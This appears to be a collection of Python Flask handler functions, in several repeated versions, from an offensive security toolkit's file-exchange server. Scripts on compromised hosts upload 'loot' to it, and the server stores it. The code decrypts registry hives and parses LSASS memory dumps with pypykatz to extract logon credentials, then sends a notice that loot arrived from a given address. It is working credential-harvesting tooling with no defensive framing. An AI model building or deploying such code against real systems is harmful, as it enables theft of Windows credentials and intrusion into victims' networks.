def upload(): """Upload one or more files""" file_list = request.files.getlist("file[]") is_from_script = "script" in request.args loot = "loot" in request.args and request.args["loot"] for file in file_list: if file.filename == '': return redirect(request.url) if file: if loot: loot_id = request.args["loot"] log.info("Loot received - %s" % loot_id) save_loot(file, loot_id, encrypted=is_from_script) else: log.info("File received - %s" % file.filename) save_file(file, encrypted=is_from_script) if loot: decrypt_hive(loot_id) push_notification("reload", "Update Loot", "") else: push_notification("reload", "Update Fileexchange", "") if is_from_script: return ('OK', 200) else: return redirect('/fileexchange')
def process_file(file, loot_id, is_from_script, remote_addr): """Save the file or the loot and return a message for push notification""" if loot_id: log.info("Loot received - %s" % loot_id) try: save_loot(file, loot_id, encrypted=is_from_script) decrypt_hive(loot_id) msg = { 'title': "Loot received!", 'body': "%s from %s has been stored." % ( file.filename, remote_addr, ), 'category': "success", } except Exception as e: msg = { 'title': "Error while processing loot", 'body': str(e), 'category': "danger", } log.exception(e) else: log.info("File received - %s" % file.filename) save_file(file, encrypted=is_from_script) msg = {} return msg
def upload(): """Upload one or more files""" file_list = request.files.getlist("file[]") for file in file_list: if file.filename == '': return redirect(request.url) if file: save_file(file) return redirect('/fileexchange')
def upload(): """Upload one or more files""" file_list = request.files.getlist("file[]") noredirect = "noredirect" in request.args for file in file_list: if file.filename == '': return redirect(request.url) if file: save_file(file) push_notification("reload", "Update Fileexchange", "") if noredirect: return ('OK', 200) else: return redirect('/fileexchange')
def save_loot(file, loot_id, encrypted=False): """Process the loot file""" filename = save_file(file, dir=LOOT_DIR, encrypted=encrypted) loot_type = get_loot_type(filename) log.debug("Saving %s [%s]" % (filename, loot_type)) if loot_type == "DMP": from pypykatz.pypykatz import pypykatz mimi = pypykatz.parse_minidump_file(filename) creds = [json.loads(v.to_json()) for _, v in mimi.logon_sessions.items()] store_minidump(loot_id, json.dumps(creds), filename) elif loot_type == "SYSINFO": add_sysinfo(loot_id, filename) else: # registry hive add_hive(loot_id, loot_type, filename)
def save_loot(file, loot_id, encrypted=False): """Process the loot file""" filename = save_file(file, dir=LOOT_DIR, encrypted=encrypted) loot_type = get_loot_type(filename) try: if loot_type == "DMP": from pypykatz.pypykatz import pypykatz mimi = pypykatz.parse_minidump_file(filename) creds = [ json.loads(v.to_json()) for _, v in mimi.logon_sessions.items() ] store_minidump(loot_id, json.dumps(creds), filename) elif loot_type == "SYSINFO": add_sysinfo(loot_id, filename) else: # registry hive add_hive(loot_id, loot_type, filename) except ImportError as e: log.error("You have unmet dependencies, loot could not be processed") log.exception(e)